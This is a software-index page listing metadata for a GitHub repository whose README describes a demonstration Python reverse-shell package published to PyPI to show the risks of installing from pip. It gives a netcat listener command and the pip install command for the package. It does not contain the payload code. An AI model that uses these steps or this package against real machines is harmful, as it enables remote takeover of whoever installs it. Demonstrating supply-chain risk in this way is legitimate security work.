Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/the-robin-hood/pip-remote-access
To show the vulnerability of PIP
https://github.com/the-robin-hood/pip-remote-access
Last synced: 10 days ago
JSON representation
To show the vulnerability of PIP
- Host: GitHub
- URL: https://github.com/the-robin-hood/pip-remote-access
- Owner: The-Robin-Hood
- License: mit
- Created: 2022-07-25T15:48:41.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-07-25T16:07:09.000Z (over 2 years ago)
- Last Synced: 2024-08-07T10:33:30.043Z (3 months ago)
- Language: Python
- Size: 5.7 MB
- Stars: 2
- Watchers: 1
- Forks: 4
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- Changelog: CHANGELOG.md
- License: LICENSE.md
Awesome Lists containing this project
README
# Explanation:
This is Simple Python Reverse Shell module.
It is show how one can write a exploit and upload a malicious code to pyorg.
If installed how the attacker can get over your machine.1. First Listen on 1234 port with netcat
`nc -lvp 1234`2. Install the package
`pip install pip-remote-access`